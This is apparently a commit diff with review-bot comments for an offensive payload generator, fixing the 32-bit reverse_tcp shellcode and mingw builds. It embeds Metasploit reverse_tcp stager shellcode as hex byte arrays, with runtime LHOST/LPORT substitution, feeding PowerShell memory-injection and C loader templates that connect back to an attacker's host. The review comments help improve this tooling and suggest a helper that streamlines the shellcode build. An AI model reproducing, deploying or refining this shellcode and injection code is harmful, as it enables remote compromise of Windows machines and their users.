Fix for broken 32bit shellcode and mingw-compile (ISSUE #8)
@@ -283,10 +283,24 @@ class Utility(object):
lhost = [byte for byte in lhost if byte >= 0 and byte <= 255]
lport = int(lport)
if len(lhost) == 4 and lport > 0 and lport <= 65535:
return ",".join(hex(b) for b in (list(Utility.binary_array_string(lport))[::-1] + list(Utility.binary_array_string(lhost[0])) + list(Utility.binary_array_string(lhost[1])) + list(Utility.binary_array_string(lhost[2])) + list(Utility.binary_array_string(lhost[3]))))
return (",".join(hex(b) for b in list(Utility.binary_array_string(lport))[::-1]), (",".join(hex(b) for b in (list(Utility.binary_array_string(lhost[0])) + list(Utility.binary_array_string(lhost[1])) + list(Utility.binary_array_string(lhost[2])) + list(Utility.binary_array_string(lhost[3]))))))
except:
Print.error("There is something wrong with the LHOST and LPORT")
sys.exit(2)
@staticmethod
def replace_all(string, target, replacement):
target = list(target)
replacement = list(replacement)
for i in range(len(target)):
if (i > (len(replacement) - 1)):
break
string = string.replace(target[i], replacement[i])
return string
@staticmethod
def load_configuration(configuration):
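Review bot: replace_all silently stops substituting when `replacement` is shorter than `target` (the `break` behind the `i > (len(replacement) - 1)` check), so a placeholder such as `[_LHOST_]` would survive into the returned string with no error; the callers pass a fixed two-element tuple today, so this is latent, but the function should fail loudly rather than truncate. `target = list(target)` also turns a plain `str` argument into a list of single characters, which does not look intended. A tighter body is `if len(target) != len(replacement): raise ValueError("target and replacement must have the same length")` followed by `for old, new in zip(target, replacement): string = string.replace(old, new)`, with a docstring saying substitutions are applied in order, so a replacement may itself be rewritten by a later pair. local_address_to_binary_array_string begins before this hunk; its new tuple return (port bytes first, then host bytes) is what the positional pairing at the call sites depends on, and that ordering should be stated in its docstring.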
@@ -446,11 +460,11 @@ powershell_block = Utility.enum(
)
memory_injection_payload = Utility.enum(
METERPRETER = "meterpreter",
shellcode = Utility.enum(
REVERSE_TCP_64 = "reverse_tcp_64",
REVERSE_TCP_32 = "reverse_tcp_32",
)
# Placeholder values for powershell blocks with obfuscation techniques
obfuscation = {
@@ -701,7 +715,7 @@ c_source_mb = """
c_source = """#include <stdlib.h>
#include <windows.h>
int WinMain(
int WINAPI WinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
@@ -747,7 +761,7 @@ c_source_embedded = """#define _CRT_SECURE_NO_DEPRECATE
#include <stdlib.h>
#include <windows.h>
int WinMain(
int WINAPI WinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
@@ -837,9 +851,10 @@ powershell_blocks = {
}
# Payloads prepared for memory injection
memory_injection_payloads = {
# metasploit stager for meterpreter. This also works with vncinjection on W7 (but fails on W10)
memory_injection_payload.METERPRETER
shellcodes = {
# reverse_tcp stager stager for metasploit.
shellcode.REVERSE_TCP_64
: "0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,"
+ "0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,"
+ "0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,"
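Review bot: The new `shellcodes` table embeds opaque byte strings with no provenance: nothing records where the REVERSE_TCP_64 entry came from, which version produced it, or what a reviewer should compare it against, so the blob cannot be audited or reproduced later; the same applies to the REVERSE_TCP_32 entry in the next hunk (`@@ -869`). Add a header comment above each entry along the lines of `# Source: <generator and version placeholder>; LHOST/LPORT are patched in at runtime by Utility.replace_all`, and keep it updated whenever the bytes change. The entry comment `# reverse_tcp stager stager for metasploit.` repeats "stager".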
@@ -869,6 +884,26 @@ memory_injection_payloads = {
+ "0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,"
+ "0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff,"
+ "0xe7",
shellcode.REVERSE_TCP_32
: "0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,"
+ "0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,"
+ "0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,"
+ "0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,"
+ "0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,"
+ "0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,"
+ "0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,"
+ "0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,"
+ "0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,"
+ "0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,"
+ "0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,[_LHOST_]," # << LHOST gets declared here as 4 bytes
+ "0x68,0x02,0x00,[_LPORT_],0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68," # << LPORT gets declared here as 2 bytes
+ "0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,"
+ "0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,"
+ "0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,"
+ "0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,"
+ "0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,"
+ "0x1,0xc3,0x29,0xc6,0x75,0xee,0xc3",
}
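Review bot: The final line of the REVERSE_TCP_32 entry writes `0x1` where every other byte in the table is two hex digits (`0x01`); the string is passed through as text by replace_all and into the templates, so any consumer that assumes fixed-width `0x%02x` tokens would misread it, and even if none does today the inconsistency is a trap — change it to `0x01`. The `# << LHOST gets declared here as 4 bytes` and `# << LPORT ... as 2 bytes` markers are the only place the placeholder widths are stated; they should also be mentioned next to `[_LPORT_]`/`[_LHOST_]` at the call sites, since those pass the two values positionally and nothing else ties 4-byte and 2-byte substitutions to the right slot.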
@@ -1447,11 +1482,12 @@ class Listener(object):
if payload_type == conf_name.METERPRETER:
payload = generate_injection(
memory_injection_payloads[memory_injection_payload.METERPRETER].replace(
"[_LPORT_],[_LHOST_]",
Utility.replace_all(
shellcodes[(shellcode.REVERSE_TCP_32 if self.os_target == os_target.WIN32 else shellcode.REVERSE_TCP_64)],
("[_LPORT_]", "[_LHOST_]"),
Utility.local_address_to_binary_array_string(lhost, lport)
), self.os_target
).encode("utf8")
).encode("utf8")
elif payload_type == conf_name.REVERSE_SHELL:
payload = generate_reverse_shell(lhost, lport).encode("utf8")
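Review bot: The expression that picks the 32- or 64-bit entry from `shellcodes` and substitutes LPORT/LHOST into it is duplicated verbatim between this hunk and the generate_injection_payload hunk at `@@ -2392`, differing only in where the target and address come from; the pairing of `("[_LPORT_]", "[_LHOST_]")` with the tuple returned by local_address_to_binary_array_string is purely positional and nothing at either site documents that the two orders must stay in sync. Factor the selection and substitution into a single helper on Utility so the ordering lives in one place, and call it from both sites (`Utility.build_shellcode(self.os_target, lhost, lport)` here, the configuration values in the other). The enclosing Listener method starts before this hunk.
```python
@staticmethod
def build_shellcode(target, lhost, lport):
    """Return the reverse_tcp shellcode for *target* with LPORT and LHOST filled in."""
    key = shellcode.REVERSE_TCP_32 if target == os_target.WIN32 else shellcode.REVERSE_TCP_64
    # Placeholder tuple and the returned tuple are paired positionally: port first, then host.
    return Utility.replace_all(
        shellcodes[key],
        ("[_LPORT_]", "[_LHOST_]"),
        Utility.local_address_to_binary_array_string(lhost, lport),
    )
# … unchanged: call sites replace the inline shellcodes[...] / replace_all expression with build_shellcode(...) …
```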
@@ -2379,7 +2415,6 @@ def generate_reverse_shell(lhost, lport):
# Generates injection payload powershell block
# Generates injection payloads either from templates or from path
def generate_injection_payload():
global memory_injection_payloads
# Create an empty holder for an embedded payload
payload_embedded = ""
@@ -2392,8 +2427,9 @@ def generate_injection_payload():
elif Utility.get_configuration_value(conf_name.METERPRETER):
payload_embedded = Utility.ps_base64encode(
generate_injection(
memory_injection_payloads[memory_injection_payload.METERPRETER].replace(
"[_LPORT_],[_LHOST_]",
Utility.replace_all(
shellcodes[(shellcode.REVERSE_TCP_32 if Utility.get_configuration_value(conf_name.TARGET) == os_target.WIN32 else shellcode.REVERSE_TCP_64)],
("[_LPORT_]", "[_LHOST_]"),
Utility.local_address_to_binary_array_string(Utility.get_configuration_value(conf_name.LHOST), Utility.get_configuration_value(conf_name.LPORT))
), Utility.get_configuration_value(conf_name.TARGET)
)